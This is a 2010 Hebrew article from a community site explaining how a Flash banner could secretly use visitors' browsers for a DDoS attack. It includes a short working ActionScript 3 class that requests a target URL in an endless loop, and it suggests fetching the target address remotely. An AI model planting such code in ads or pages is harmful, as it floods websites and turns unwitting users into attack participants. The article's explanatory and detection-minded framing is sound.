אתר מאמרים
מעגל הכותבים
אתר מאמרים קהילתי
שלום אורח!

מאמרים » תוכנה » התקפת DDoS באמצעות פלאש

התקפת DDoS באמצעות פלאש

מחבר המאמר: eladeladelad
פורסם בקטגוריה: תוכנה
המאמר נקרא 323 פעמים
תאריך פרסום: 15.08.10
גרסת הדפסה | 0 תגובות
שיתוף מאמר זה שיתוף מאמר זה


התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט). מטרת התקיפה היא לגרום להשבתת פעילות הגורם (לדוגמא: מניעה מאתר מסויים לתת שירות לגולשיו), בהמשך אפרט איך ניתן מקובץ פלאש בלתי-מזיק לכאורה ליצור התקפה מאסיבית על אתרי אינטרנט. התקפות DDoS מבוצעות ע"י ניצול המשאבים של הגורם המותקף כך שמשאביו של הגורם המותקף לא יהיו פנויים עבור משתמשים רגילים, לדוגמא כשהדפדפן מבקש עמוד מסויים מאתר אינטרנט, השרת בו נמצא האתר מעבד את הבקשה ולאחר מכן שולח את העמוד לגולש אשר ביקש אותו. במידה והשרת יקבל כמות פניות אדירה, רכיבי החומרה והתוכנה שבו לא יוכלו לעמוד בעומס ופשוט יקרסו, זוהי תוצאה של התקפת DoS או DDoS, בעל האתר יכול להתקין הגנות בין מי שמנסה להתקיף את האתר לבין השרת בו מותקן האתר, כגון: רכיבי חומרה או תוכנה שיודעים לזהות התקפות, לעמוד בעומס כבד ולסנן את הבקשות הזדוניות לפני שהן מגיעות לאתר.

באפליקציית פלאש (קובץ SWF) אפשר לבצע קריאות לכתובת אינטרנט בפרוטוקול http ע"י שימוש במחלקה URLRequest. ע"י קריאות חוזרות ונישנות למחלקה זו אפשר לטעון עמודי אינטרנט של אתר מסויים שוב ושוב. פעולה זו ממחשב אחד לא תגרום לקריסת האתר ולא תפגע בביצועיו, אבל מה יקרה אם קוד זה יהיה קיים בתוך באנר פלאש שמוצג בפורטל גדול ? כל הגולשים שייראו את הבאנר, יהפכו להיות כלים בהתקפת DDoS ללא ידיעתם.

קוד לדוגמא בשפת אקשן-סקריפט 3

package { import flash.display.*; import flash.events.*; import flash.net.*; public class DDoS extends MovieClip { public var Url:String = "http://www.website.com";  public var UrlLoader:URLLoader = new URLLoader(); public function DDoS()  { UrlLoader.addEventListener(Event.COMPLETE, Loop); Loop(); } private function Loop(e:Event=null):void { UrlLoader.load(new URLRequest(Url)); }}}

אם כתובת האתר המותקף (מוגדרת במשתנה Url) תיטען באופן דינאמי מכתובת באינטרנט אז יהיה אפשר לשנות את כתובת האתר המותקף מרחוק ללא שינוי בקובץ ה-SWF.

האם הפורטלים הגדולים בודקים את הקוד של קבצי ה-SWF המוצגים לגולשים ? האם יש כלי אוטומטי שבודק קבצי SWF ומחפש קוד עויין ? (רעיון לסטארט אפ)  



אודות מחבר המאמר:

המאמר נכתב ע"י אלעד כהן - מתכנת פלאש בחברת GAME DEV LTD (גיימדב בע"מ) העוסקת בפיתוח אפליקציות לפייסבוק, פיתוח אפליקציות לאייפון ופיתוח משחקי מחשב.


דירוג המאמר: לא דורג עדיין

תגובות למאמר התקפת DDoS באמצעות פלאש תגובות למאמר התקפת DDoS באמצעות פלאש

עד כה לא נרשמו כל תגובות למאמר התקפת DDoS באמצעות פלאש. רוצה להיות הראשון?

הוספת תגובה חדשה


שם מלא:


כתובת דוא"ל:


תוכן התגובה

הקלידו את הקוד שבתמונה

Visual CAPTCHA


מאמרים נוספים בנושא תוכנה

ניהול תזרים מזומנים
בדיקות תוכנה, QA ומה שביניהם
פיתוח אפליקציות לאנדרואיד
תוכנת תיווך
מערכת בדיקה אופטית מבוססת עיבוד תמונה לזיהוי פגמים בייצור יריעות
מודעות דרושים JAVA למשרות הייטק
מי צריך קופה רושמת?
על איחזור מידע בתוכנה להנהלת חשבונות
על קלות התנועה (נוויגציה) בתוכנה להנהלת חשבונות
שירותים אשר ניתן לקבל באמצעות מיקור חוץ
מערכת ראייה ממוחשבת בענף המזון המעובד
פתרונות מחשוב
תקנות חישוב שטחים
חישוב שטחים
אוטוקאד - הבלוקים בשרטוט

הנך נמצא כאן: התקפת DDoS באמצעות פלאש.

פרסם את מאמריך באתר! פרסם את מאמריך באתר!
תהנה מחשיפה מקצועית בחינם ואפשר לאלפי גולשים פוטנציאליים להיחשף לדעותיך.
פרסם מאמר.